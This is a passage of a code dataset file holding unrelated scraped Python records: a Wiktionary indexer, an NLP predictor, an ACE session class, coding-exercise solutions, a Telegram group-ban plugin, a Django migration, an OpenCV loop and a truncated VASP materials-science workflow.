\"cyan\")\n\n","sub_path":"joomla/joomla.py","file_name":"joomla.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"548571714","text":"file = \"/mnt/Data/Datasets/Wiktionary/ukwiktionary-20190101-pages-articles.xml\"\nbigfile = \"/mnt/Data/Datasets/Wiktionary/enwiktionary-latest-pages-articles.xml\"\n# out_folder = \"/mnt/Data/Datasets/Wiktionary/\"\n\nlanguage_filtering_templates = {\"uk\":[\"[Category:Українськ\",\n \"[Категорія:Українськ\"]}\n\ndef filter_by_language_templates(language, language_filtering_templates,\n location_index, xml_dump):\n templates = language_filtering_templates[language]\n filtered_index = {}\n for item in location_index:\n entry = retrieve_by_index(item, location_index)\n for template in templates:\n if template in entry:\n filtered_index[item] = location_index[item]\n break\n\n return filtered_index\n\n\n\n\n# the first num is the offset from beginning of the file,\n# and the second is the length of the article\nlocations_index = {\"cat\":[3000500000, 15]}\n\ndef retrieve_by_index(word, locations_index):\n try:\n locations = locations_index[word]\n except KeyError:\n print(\"The word '\"+word+\"' was not found in the index.\")\n return None\n f = open(file, 'rb')\n f.seek(locations[0], 0) # move the file pointer forward 6 bytes (i.e. 
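The com_docman payload in the joomla.py record hides its target path in base64; decoding it shows exactly what the LFI probe tries to read:

```python
import base64

payload_file = "Li4vY29uZmlndXJhdGlvbi5waHA="  # from the record's payload
print(base64.b64decode(payload_file).decode())  # ../configuration.php
```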
to the 'w')\n article = f.read(locations[1]) # read the rest of the article\n # from the pointer\n f.close()\n return article.decode(\"utf-8\")\n\nlocations_index = {'навігатор': [331487, 2639]}\n\n# print(retrieve_by_index('навігатор', locations_index))\n\ndef build_index(xml_dump):\n\n locations_index = []\n\n fh = open(xml_dump, \"r\")\n\n def get_word_position(start_position):\n while True:\n row = fh.readline()\n if \"\" in row:\n start = fh.tell()\n if \"\" in row:\n word = row.strip()\n word = word.strip(\"<title>\")\n word = word.strip(\"\")\n if \"\" in row:\n end = fh.tell()\n length = end-start\n locations_index.append([word, start, length, end])\n return None\n if \"\" in row:\n locations_index.append(None)\n return None\n\n # get the first article starting at position 0\n get_word_position(0)\n\n #get the rest of the articles\n while True:\n if isinstance(locations_index[-1], list):\n get_word_position(locations_index[-1][-1])\n else:\n break\n locations_index = locations_index[:-1]\n fh.close()\n\n # save the results\n outpath = file.replace(\".xml\", \".yaml\")\n with open(outpath, \"w\") as out:\n for l in locations_index:\n # get rid of \"category: whatever type pages\"\n if not \":\" in l[0]:\n out.write(l[0]+\": [\"+str(l[1])+\", \"+str(l[2])+\"]\\n\")\n # return locations_index\n\n #format the output as dictionary\n\n# test = retrieve_by_index(\"cat\", locations_index)\n# print(test)\nbuild_index(xml_dump=file)\n","sub_path":"utils/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"407569682","text":"from typing import List, Iterator\nfrom overrides import overrides\nfrom allennlp.common.util import JsonDict, sanitize\nimport json\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.data.dataset_readers import MultiprocessDatasetReader\nfrom allennlp.predictors.predictor import Predictor\nfrom allennlp.models import Model\nimport numpy as np\nimport torch\n\n\ndef order2chain(order):\n chain = []\n for s_idx, o in enumerate(order):\n o = int(o)\n if o >= 0:\n if o >= len(chain):\n chain += [-1]*(o+1-len(chain))\n chain[o] = s_idx\n if not all([i >= 0 for i in chain]):\n print(\"order:\", order)\n print(\"chain:\", chain)\n #exit()\n pos = None\n for i, c in enumerate(chain):\n if c < 0:\n pos = i\n chain = chain[:pos]\n return chain\n\n\n@Predictor.register('hotpot_bert_chainex_predictor')\nclass HotpotPredictor(Predictor):\n @overrides\n def _json_to_instance(self, hotpot_dict_instance: JsonDict) -> Instance:\n print(type(hotpot_dict_instance), len(hotpot_dict_instance))\n if type(self._dataset_reader) == MultiprocessDatasetReader:\n processed_instance = self._dataset_reader.reader.process_raw_instance(hotpot_dict_instance)\n else:\n processed_instance = self._dataset_reader.process_raw_instance(hotpot_dict_instance)\n instance = self._dataset_reader.text_to_instance(*processed_instance)\n return instance\n\n def process_output(self, output: JsonDict) -> JsonDict:\n pred_sent_orders = output.get('pred_sent_orders', None)\n num_sents = len(output['sent_labels']) # for removing padding\n if not pred_sent_orders is None:\n pred_chains = [order2chain(order) for order in pred_sent_orders]\n pred_chains = [ch for ch in pred_chains if all(c < num_sents for c in ch)]\n assert len(pred_chains) > 0, repr([order2chain(order) for order in pred_sent_orders]) + '\\n' + 'num sents: %d' % num_sents + '\\n%s' % output['_id']\n else:\n # get 
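A subtlety in offline.py's `build_index`: `str.strip("<title>")` removes a *set of characters*, not the literal tag, so any title composed of those characters gets eaten from the ends. A regex extraction sidesteps it:

```python
import re

def extract_title(row):
    match = re.search(r"<title>(.*?)</title>", row)
    return match.group(1) if match else None

print(extract_title("  <title>elite</title>"))   # elite
print("<title>elite</title>".strip("<title>"))   # '/' -- tag characters eaten
```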
pred evdiences from sentences with top k ``gate_prob``\n gate_probs = output['gate_probs'][:num_sents]\n pred_chains = [[i] for i in sorted(range(num_sents), key=lambda x: gate_probs[x], reverse=True)[:10]]\n return {#'answer_texts': output['answer_texts'],\n #'best_span_str': output.get('best_span_str', None),\n #'best_span': output.get('best_span', None),\n 'pred_sent_labels': output.get('pred_sent_labels', None),\n 'pred_sent_orders': output.get('pred_sent_orders', None),\n 'pred_chains': pred_chains,\n 'possible_chain': output.get('evd_possible_chains', None),\n 'question_tokens': output['question_tokens'],\n 'passage_sent_tokens': output['passage_sent_tokens'],\n #'token_spans_sp': output['token_spans_sp'],\n #'token_spans_sent': output['token_spans_sent'],\n 'sent_labels': output['sent_labels'],\n 'ans_sent_idxs': output.get('ans_sent_idxs', None),\n '_id': output['_id']}\n\n @overrides\n def predict_instance(self, instance: Instance) -> JsonDict:\n outputs = self._model.forward_on_instance(instance)\n outputs = sanitize(outputs)\n return self.process_output(outputs)\n\n @overrides\n def predict_batch_instance(self, instances: List[Instance]) -> List[JsonDict]:\n outputs = self._model.forward_on_instances(instances)\n outputs = sanitize(outputs)\n return [self.process_output(o) for o in outputs]\n\n def predict(self, hotpot_dict_instance: JsonDict) -> JsonDict:\n \"\"\"\n Expects JSON that has the same format of instances in Hotpot dataset\n \"\"\"\n return self.predict_json(hotpot_dict_instance)\n","sub_path":"my_library/predictors/hotpot_bert_chainex_predictor.py","file_name":"hotpot_bert_chainex_predictor.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"504503122","text":"import requests\n\nfrom ecdsa import SigningKey, VerifyingKey, NIST256p\nfrom ace.edhoc import Client as EdhocClient\n\n\nclass AceSession:\n\n session_id = 0\n\n def __init__(self, session_id, private_pop_key, public_pop_key, pop_key_id: bytes):\n self.session_id = session_id\n self.private_pop_key = private_pop_key\n self.public_pop_key = public_pop_key\n self.pop_key_id = pop_key_id\n self.token = None\n self.rs_url = None\n self.edhoc_client = EdhocClient(self.private_pop_key,\n None,\n kid=self.pop_key_id)\n self.oscore_context = None\n\n # @property\n # def oscore_context(self):\n # return self.edhoc_client.session.oscore_context\n\n @property\n def rs_public_key(self):\n return self.edhoc_client.server_id\n\n @rs_public_key.setter\n def rs_public_key(self, value):\n self.edhoc_client.server_id = value\n\n @classmethod\n def create(cls, key_id: bytes):\n (prv_key, pub_key) = AceSession.generate_session_key()\n\n session_id = AceSession.session_id\n AceSession.session_id += 1\n\n return AceSession(session_id=session_id,\n private_pop_key=prv_key,\n public_pop_key=pub_key,\n pop_key_id=key_id)\n\n @staticmethod\n def generate_session_key():\n \"\"\"\n Generates an asymmetric session key\n :return: (private_key, public_key) pair\n \"\"\"\n\n private_key = SigningKey.generate(curve=NIST256p)\n public_key = private_key.get_verifying_key()\n\n return private_key, public_key\n","sub_path":"ace/client/ace_session.py","file_name":"ace_session.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"57774257","text":"\"\"\"\nDay 24: More Linked Lists 
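`AceSession.generate_session_key` above produces an `ecdsa` NIST256p key pair for proof-of-possession; a quick round trip showing how such a pop key signs and verifies a payload:

```python
from ecdsa import SigningKey, NIST256p

private_key = SigningKey.generate(curve=NIST256p)
public_key = private_key.get_verifying_key()

signature = private_key.sign(b"proof-of-possession")
assert public_key.verify(signature, b"proof-of-possession")  # True, or raises
```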
\n\nhttps://www.hackerrank.com/challenges/30-linked-list-deletion\n\"\"\"\nimport unittest\nimport contextlib\nfrom io import StringIO\n\n\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Solution(object):\n def insert(self, head, data):\n p = Node(data)\n if head == None:\n head = p\n elif head.next == None:\n head.next = p\n else:\n start = head\n while (start.next != None):\n start = start.next\n start.next = p\n\n return head\n\n def display(self, head):\n current = head\n while current:\n print(current.data, end=' ')\n current = current.next\n\n def removeDuplicates(self, head):\n node = head\n while node is not None:\n if node.next is None:\n break\n else:\n if node.data == node.next.data:\n node.next = node.next.next\n else:\n node = node.next\n\n return head\n\n\nif __name__ == '__main__':\n mylist = Solution()\n T = int(input())\n head = None\n for i in range(T):\n data = int(input())\n head = mylist.insert(head, data)\n head = mylist.removeDuplicates(head)\n mylist.display(head)\n\n\nclass TestLinkedList(unittest.TestCase):\n def test_remove_duplicates(self):\n mylist = Solution()\n head = None\n\n for item in [1, 2, 2, 3, 3, 4]:\n head = mylist.insert(head, item)\n\n head = mylist.removeDuplicates(head)\n\n out = StringIO()\n with contextlib.redirect_stdout(out):\n mylist.display(head)\n\n self.assertEqual(\n \"1 2 3 4\",\n out.getvalue().strip()\n )\n","sub_path":"day_24_more_linked_list.py","file_name":"day_24_more_linked_list.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"91586126","text":"# credits to @mrconfused dont edit credits\n\nimport asyncio\nfrom datetime import datetime\n\nfrom telethon.errors import BadRequestError\nfrom telethon.tl.functions.channels import EditBannedRequest\nfrom telethon.tl.types import ChatBannedRights, MessageEntityMentionName\n\nimport sql_helpers.gban_sql_helper as gban_sql\nfrom uniborg import MODULE, SYNTAX\nfrom uniborg.util import admin_cmd\nfrom userbot import PEPE_ID, admin_groups\n\nMODULE.append(\"gban\")\n\nBANNED_RIGHTS = ChatBannedRights(\n until_date=None,\n view_messages=True,\n send_messages=True,\n send_media=True,\n send_stickers=True,\n send_gifs=True,\n send_games=True,\n send_inline=True,\n embed_links=True,\n)\n\nUNBAN_RIGHTS = ChatBannedRights(\n until_date=None,\n send_messages=None,\n send_media=None,\n send_stickers=None,\n send_gifs=None,\n send_games=None,\n send_inline=None,\n embed_links=None,\n)\n\nif Config.BOTLOG is None:\n BOTLOG = False\nelse:\n BOTLOG = True\n BOTLOG_CHATID = Config.BOTLOG\n\n\n@borg.on(admin_cmd(pattern=\"gban(?: |$)(.*)\"))\nasync def catgban(cat):\n await cat.edit(\"`Gbaning this gey...`\")\n start = datetime.now()\n user, reason = await get_user_from_event(cat)\n if not user:\n return\n if user.id == (await cat.client.get_me()).id:\n await cat.edit(\"`Why would i ban myself.. KEK`\")\n return\n if user.id in PEPE_ID:\n await cat.edit(\"`Why would I ban my DEVELOPER.. LMAO`\")\n return\n if gban_sql.is_gbanned(user.id):\n await cat.edit(\n f\"The [user](tg://user?id={user.id}) is already in Gbanned list any way checking again\"\n )\n else:\n gban_sql.catgban(user.id, reason)\n san = []\n san = await admin_groups(cat)\n count = 0\n sandy = len(san)\n if sandy == 0:\n await cat.edit(\"`You are not admin of atleast one group.. 
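The Day-24 `insert` above walks the whole list on every append, so building n nodes costs O(n²). A variant sketch that keeps a tail pointer (reusing the record's `Node`) makes each append O(1):

```python
class FastList:
    def __init__(self):
        self.head = None
        self.tail = None

    def insert(self, data):
        node = Node(data)  # Node as defined in the record above
        if self.head is None:
            self.head = node
        else:
            self.tail.next = node
        self.tail = node
```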
USELESS`\")\n return\n await cat.edit(\n f\"`Initiating Gban of the` [User](tg://user?id={user.id}) `in {len(san)}` groups\"\n )\n for i in range(sandy):\n try:\n await cat.client(EditBannedRequest(san[i], user.id, BANNED_RIGHTS))\n await asyncio.sleep(0.5)\n count += 1\n except BadRequestError:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"You don't have required permission in :\\nCHAT: {cat.chat.title}(`{cat.chat_id}`)\\nFor baning here\",\n )\n try:\n reply = await cat.get_reply_message()\n if reply:\n await reply.delete()\n except BadRequestError:\n await cat.edit(\n \"`I dont have message deleting rights here! But still he was gbanned!`\"\n )\n end = datetime.now()\n cattaken = (end - start).seconds\n if reason:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was gbanned in `{count}` groups in `{cattaken} seconds`!!\\nReason: `{reason}`\"\n )\n else:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was gbanned in `{count}` groups in `{cattaken} seconds`!!\"\n )\n\n if BOTLOG and count != 0:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"#GBAN\\nGlobal BAN\\nUser: [{user.first_name}](tg://user?id={user.id})\\nID: `{user.id}`\\\n \\nReason: `{reason}`\\nBanned in `{count}` groups\\nTime taken = `{cattaken} seconds`\",\n )\n\n\n@borg.on(admin_cmd(pattern=\"ungban(?: |$)(.*)\"))\nasync def catgban(cat):\n await cat.edit(\"`Ungbaning this Nibba...`\")\n start = datetime.now()\n user, reason = await get_user_from_event(cat)\n if not user:\n return\n if gban_sql.is_gbanned(user.id):\n gban_sql.catungban(user.id)\n else:\n await cat.edit(\n f\"The [user](tg://user?id={user.id}) is not in your gbanned list\"\n )\n return\n san = []\n san = await admin_groups(cat)\n count = 0\n sandy = len(san)\n if sandy == 0:\n await cat.edit(\"you are not admin of atleast one group \")\n return\n await cat.edit(\n f\"`Initiating Ungban of the` [user](tg://user?id={user.id}) `in {len(san)} groups`\"\n )\n for i in range(sandy):\n try:\n await cat.client(EditBannedRequest(san[i], user.id, UNBAN_RIGHTS))\n await asyncio.sleep(0.5)\n count += 1\n except BadRequestError:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"You don't have required permission in :\\nCHAT: {cat.chat.title}(`{cat.chat_id}`)\\nFor unbaning here\",\n )\n end = datetime.now()\n cattaken = (end - start).seconds\n if reason:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was ungbanned in `{count}` groups in `{cattaken} seconds`!!\\nReason: `{reason}`\"\n )\n else:\n await cat.edit(\n f\"[{user.first_name}](tg://user?id={user.id}) was ungbanned in `{count}` groups in `{cattaken} seconds`!!\"\n )\n\n if BOTLOG and count != 0:\n await borg.send_message(\n BOTLOG_CHATID,\n f\"#UNGBAN\\nGlobal UNBAN\\nUser: [{user.first_name}](tg://user?id={user.id})\\nID: {user.id}\\\n \\nReason: `{reason}`\\nUnbanned in `{count}` groups\\nTime taken = `{cattaken} seconds`\",\n )\n\n\n@borg.on(admin_cmd(pattern=\"listgban$\"))\nasync def gablist(event):\n if event.fwd_from:\n return\n gbanned_users = gban_sql.get_all_gbanned()\n GBANNED_LIST = \"**Current Gbanned Users**\\n\\n\"\n if len(gbanned_users) > 0:\n for a_user in gbanned_users:\n if a_user.reason:\n GBANNED_LIST += f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) for {a_user.reason}\\n\"\n else:\n GBANNED_LIST += (\n f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) Reason None\\n\"\n )\n else:\n GBANNED_LIST = \"`No Gbanned Users` **(yet)**\"\n if len(GBANNED_LIST) > 4095:\n with io.BytesIO(str.encode(GBANNED_LIST)) as out_file:\n 
out_file.name = \"Gbannedusers.txt\"\n await event.client.send_file(\n event.chat_id,\n out_file,\n force_document=True,\n allow_cache=False,\n caption=\"Current Gbanned Users\",\n reply_to=event,\n )\n await event.delete()\n else:\n await event.edit(GBANNED_LIST)\n\n\nasync def get_user_from_event(event):\n \"\"\"Get the user from argument or replied message.\"\"\"\n args = event.pattern_match.group(1).split(\" \", 1)\n extra = None\n if event.reply_to_msg_id:\n previous_message = await event.get_reply_message()\n user_obj = await event.client.get_entity(previous_message.sender_id)\n extra = event.pattern_match.group(1)\n elif args:\n user = args[0]\n if len(args) == 2:\n extra = args[1]\n if user.isnumeric():\n user = int(user)\n if not user:\n await event.edit(\"`Pass the user's username, id or reply!`\")\n return\n if event.message.entities:\n probable_user_mention_entity = event.message.entities[0]\n\n if isinstance(probable_user_mention_entity, MessageEntityMentionName):\n user_id = probable_user_mention_entity.user_id\n user_obj = await event.client.get_entity(user_id)\n return user_obj\n try:\n user_obj = await event.client.get_entity(user)\n except (TypeError, ValueError):\n await event.edit(\"Could not fetch info of that user.\")\n return None\n return user_obj, extra\n\n\nSYNTAX.update(\n {\n \"gadmin\": \".gban \\\n\\n**Usage : **Bans the person in all groups where you are admin .\\\n\\n\\n.ungban \\\n\\n**Usage : **Reply someone's message with .ungban to remove them from the gbanned list.\\\n\\n\\n.listgban\\\n\\n**Usage : **Shows you the gbanned list and reason for their gban.\\\n\\n\\n.gmute \\\n\\n**Usage : **Mutes the person in all groups you have in common with them.\\\n\\n\\n.ungmute \\\n\\n**Usage : **Reply someone's message with .ungmute to remove them from the gmuted list.\"\n }\n)\n","sub_path":"dbplugins/gban.py","file_name":"gban.py","file_ext":"py","file_size_in_byte":8284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"136537341","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: d:\\users\\ma_k\\appdata\\local\\temp\\pip-build-s8wja0\\httplog\\httplog\\migrations\\0001_initial.py\n# Compiled at: 2016-11-28 21:21:16\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion, jsonfield.fields\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [\n migrations.CreateModel(name=b'HttpLog', fields=[\n (\n b'id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name=b'ID')),\n (\n b'created_at', models.DateTimeField(auto_now_add=True, null=True)),\n (\n b'updated_at', models.DateTimeField(auto_now=True, null=True)),\n (\n b'client', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'server', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'request', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'response', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'name', models.CharField(blank=True, max_length=256, null=True)),\n (\n b'user', models.ForeignKey(db_constraint=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name=b'httplogs', to=settings.AUTH_USER_MODEL))], 
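The gban plugin above references `Config` (for `BOTLOG`) and, inside `gablist`, `io`, without importing either; the missing imports would presumably look like the following, hedged because the surrounding userbot framework is not shown:

```python
import io  # used by gablist's BytesIO fallback for long lists
from userbot import Config  # assumption: Config lives beside PEPE_ID/admin_groups
```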
options={b'db_table': b'httplog'})]","sub_path":"pycfiles/httplog-1.2.0/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"385133889","text":"from itertools import product\n\nn = int(input())\nal = []\n\nfor _ in range(n):\n curr_al = []\n a = int(input())\n for i in range(a):\n x,y = map(int, input().split())\n curr_al.append((x,y))\n al.append(curr_al)\n\n\npattern = 2\nite = product(range(pattern),repeat=n)\nans = 0\nfor it in ite:\n a_01_l = list(it)\n curr_ans = a_01_l.count(1)\n # print('-----')\n # print(a_01_l)\n for i, curr_it in enumerate(it):\n if curr_it == 1:\n check = True\n for a in al[i]:\n if a_01_l[a[0]-1] != a[1]:\n check = False\n if not check:\n break\n else:\n # print('ok')\n ans = max(curr_ans,ans)\n\nprint(ans)\n","sub_path":"2_kakomon/abc126-211/abc147_c.py","file_name":"abc147_c.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"335671971","text":"import cv2\n\ncap = cv2.VideoCapture('C:/Users/16276/Desktop/aaa.mp4')\n\nprint(cap.isOpened())\ncap.open(0)\nwhile True:\n ret,frame = cap.read()\n print(ret)\n\n cv2.imshow('d',frame)\n if cv2.waitKey(5)&0xFF==ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"ML_01/xupengopencv/simply.py","file_name":"simply.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"251856321","text":"from __future__ import division, unicode_literals, print_function\n\nimport os\nimport sys\nimport time\nfrom math import sqrt\nfrom collections import OrderedDict\n\nfrom pymatgen.io.vasp.inputs import Incar, Poscar\nfrom pymatgen.io.vasp.inputs import Potcar, Kpoints\nfrom pymatgen.core.structure import Structure\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\nfrom custodian.vasp.handlers import VaspErrorHandler\n#from custodian.vasp.handlers import FrozenJobErrorHandler\n#from custodian.vasp.handlers import MeshSymmetryErrorHandler\n#from custodian.vasp.handlers import NonConvergingErrorHandler \n\nfrom mpinterfaces import get_struct_from_mp\nfrom mpinterfaces.interface import Interface\nfrom mpinterfaces.calibrate import Calibrate, CalibrateSlab\nfrom mpinterfaces.transformations import *\nfrom mpinterfaces.utils import *\n\n\n# default incar settings, with vdw\nincar_dict = dict(\n PREC = 'Accurate',\n ENCUT = 400,\n ISMEAR = 0,\n EDIFF = '1E-6',\n ISIF = 3,\n IBRION = 2,\n NSW = 500,\n NPAR = 4,\n LCHARG = '.FALSE.',\n GGA = 'BO',\n PARAM1 = 0.1833333333,\n PARAM2 = 0.2200000000,\n LUSE_VDW = '.TRUE.',\n AGGAC = 0.0000 )\n# INCAR\nincar_sub = Incar.from_dict(incar_dict)\nincar_sub['ISMEAR'] = 1\nincar_2d = Incar.from_dict(incar_dict)\n# KPOINTS\nkpoints_sub = Kpoints.monkhorst_automatic(kpts=(18, 18, 18))\nkpoints_2d = Kpoints.monkhorst_automatic(kpts=(18, 18, 1))\n# QUE\nnprocs = 32\nnnodes = 1\nmem='1000'\nwalltime = '24:00:00'\nbin_sub = '/home/km468/Software/VASP/vasp.5.3.5/vasp'\nbin_2d = '/home/km468/Software/VASP/vasp.5.3.5/vasp_noz'\n# STRUCTURES\nsubstrates = [ 'Pt', 'Ag', 'Cu', 'Ni', 'Al' , 'Au', 'Pd', 'Ir']\nmat2ds = ['POSCAR_graphene']\n\n\ndef run_cal(turn_knobs, qadapter, job_cmd, job_dir, name,\n incar=None, poscar=None, potcar=None, kpoints=None):\n \"\"\"\n setup and run calibrate job\n \"\"\"\n Calibrate.LOG_FILE = name+'.json'\n cal = Calibrate(incar, 
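simply.py above opens a video file and then immediately calls `cap.open(0)`, which discards the file and switches to the default camera; it also never checks `ret` before `imshow`. A cleaned-up loop that actually plays the file (path illustrative):

```python
import cv2

cap = cv2.VideoCapture('aaa.mp4')  # illustrative path
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:  # end of stream or read error
        break
    cv2.imshow('frame', frame)
    if cv2.waitKey(5) & 0xFF == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
```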
poscar, potcar, kpoints, \n turn_knobs=turn_knobs, qadapter=qadapter,\n job_cmd = job_cmd, job_dir=job_dir)\n cal.setup()\n cal.run()\n\n \ndef step1():\n \"\"\"\n get substrate bulk structures from materialsproject for\n Pt, Ag, Cu, Ni, Al, Au, Pd, Ir and do 3d relaxation(ISIF=3)\n \n get 2d structures from the provided poscars(just poscar_graphene)\n and relax in x and y only(vasp_noz bin)\n \n - POSCAR_graphene must be made available in the directory\n - creates required input files and submits the jobs to the que\n - 8 + 1 jobs\n - returns: step1_sub.json step1_2d.json \n \"\"\"\n #job directory for the runs\n job_dir_sub = 'step1_sub'\n job_dir_2d = 'step1_2d'\n # create list of all substrate poscars\n poscars_sub = []\n poscars_2d = []\n # substrate structures\n for sub in substrates:\n struct_sub = get_struct_from_mp(sub)\n sa_sub = SpacegroupAnalyzer(struct_sub)\n struct_sub = sa_sub.get_conventional_standard_structure()\n poscars_sub.append(Poscar(struct_sub))\n # 2d structures\n for td in mat2ds:\n poscars_2d.append(Poscar.from_file(td))\n # setup calibrate and run'em\n turn_knobs_sub = OrderedDict(\n [\n ('POSCAR', poscars_sub)\n ])\n turn_knobs_2d = OrderedDict(\n [\n ('POSCAR', poscars_2d)\n ])\n # normal binary\n qadapter_sub, job_cmd_sub = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_sub, mem=mem)\n # binary with z constraint\n qadapter_2d, job_cmd_2d = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_2d, mem=mem)\n run_cal(turn_knobs_sub, qadapter_sub, job_cmd_sub, job_dir_sub,\n 'step1_sub', incar=incar_sub, kpoints=kpoints_sub)\n run_cal(turn_knobs_2d, qadapter_2d, job_cmd_2d, job_dir_2d,\n 'step1_2d', incar=incar_2d, kpoints=kpoints_2d)\n return ['step1_sub.json', 'step1_2d.json']\n\n\ndef step2():\n \"\"\"\n read in the realxed bulk substrates and relaxed 2d,\n create substrate slab,\n get aligned substrates and 2d,\n relax the aligned structures seperatly(only ionic positions, ISIF=2)\n\n - input from step1_sub.json and step1_2d.json\n - 8(pairs) * 2 = 16 jobs\n - returns step2.json\n \"\"\"\n nlayers_2d = 1\n nlayers_sub = 2\n hkl_sub = [1,1,1]\n min_thick = 10.0\n min_vac = 18.0\n hkl_2d = [0,0,1]\n #job directory for the runs\n job_dir_sub = 'step2_sub'\n job_dir_2d = 'step2_2d'\n # isif = 2\n incar_sub['ISIF'] = 2\n incar_2d['ISIF'] = 2\n # kpoints\n kpoints_sub = Kpoints.monkhorst_automatic(kpts=(18, 18, 1))\n kpoints_2d = Kpoints.monkhorst_automatic(kpts=(18, 18, 1)) \n # CSL settings for each substrate\n alignment_settings = { 'Pt': [120, 0.10, 1, 0.5],\n 'Ag': [120, 0.10, 1, 0.5],\n 'Al': [120, 0.10, 1, 0.5],\n 'Au': [120, 0.10, 1, 0.5],\n 'Pd': [120, 0.10, 1, 0.5],\n 'Ir': [120, 0.10, 1, 0.5],\n 'Cu': [50, 0.06, 1, 0.5],\n 'Ni': [50, 0.06, 1, 0.5] }\n # load in previous jobs\n relaxed_sub_jobs = Calibrate.jobs_from_file('step1_sub.json')\n relaxed_2d_jobs = Calibrate.jobs_from_file('step1_2d.json')\n poscars_sub = []\n poscars_2d = []\n # create list of all aligned substrate and 2d slabs\n for jsub in relaxed_sub_jobs:\n jdir = os.path.join(jsub.parent_job_dir, jsub.job_dir)\n contcar_file = os.path.join(jdir, 'CONTCAR')\n relaxed_struct_sub = Structure.from_file(contcar_file)\n # create slab\n slab_sub = Interface(relaxed_struct_sub, hkl = hkl_sub,\n min_thick = min_thick, min_vac = min_vac,\n primitive = False, from_ase = True)\n species_sub = ''.join([tos.symbol for tos in slab_sub.types_of_specie])\n # loop over 2d\n for j2d in relaxed_2d_jobs: \n jdir = os.path.join(j2d.parent_job_dir, 
j2d.job_dir)\n contcar_file = os.path.join(jdir, 'CONTCAR')\n slab_2d = slab_from_file(hkl_2d, contcar_file)\n species_2d = ''.join([tos.symbol for tos in slab_2d.types_of_specie])\n # align\n slab_sub_aligned, slab_2d_aligned = get_aligned_lattices(\n slab_sub,\n slab_2d,\n *alignment_settings[species_sub])\n # aligned sub poscar\n sd_flags = CalibrateSlab.set_sd_flags(interface=slab_sub_aligned,\n n_layers=nlayers_sub)\n poscar = Poscar(slab_sub_aligned, selective_dynamics=sd_flags)\n poscar.comment = '_'.join([species_sub,species_2d,'sub']) \n poscars_sub.append(poscar)\n # aligned 2d slab\n sd_flags = CalibrateSlab.set_sd_flags(interface=slab_2d_aligned,\n n_layers=nlayers_2d)\n poscar = Poscar(slab_2d_aligned, selective_dynamics=sd_flags)\n poscar.comment = '_'.join([species_sub,species_2d,'2d'])\n poscars_2d.append(poscar)\n # setup calibrate and run'em\n turn_knobs_sub = OrderedDict(\n [\n ('POSCAR', poscars_sub)\n ])\n turn_knobs_2d = OrderedDict(\n [\n ('POSCAR', poscars_2d)\n ])\n qadapter, job_cmd = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_sub, mem=mem)\n run_cal(turn_knobs_sub, qadapter, job_cmd, job_dir_sub,\n 'step2_sub', incar=incar_sub, kpoints=kpoints_sub)\n run_cal(turn_knobs_2d, qadapter, job_cmd, job_dir_2d,\n 'step2_2d', incar=incar_2d, kpoints=kpoints_2d)\n return ['step2_sub.json', 'step2_2d.json']\n\n\ndef step3():\n \"\"\"\n put aligned & relaxed 2d materials in all possible ways on the\n aligned & relaxed slab,\n relax interface ionic positions(ISIF=2)\n\n - uses info from step2_sub.json and step2_2d.json\n - creates required input files and submits the jobs to the que\n - 8(pairs) * 2(atoms in graphene basis) = 16 jobs\n - returns: step3.json \n \"\"\"\n seperation = 3 # in angstroms\n nlayers_2d = 1\n nlayers_sub = 2\n hkl_sub = [1,1,1]\n hkl_2d = [0,0,1]\n #job directory for the runs\n name = 'step3' \n job_dir = 'step3'\n # incar\n incar = Incar.from_dict(incar_dict)\n 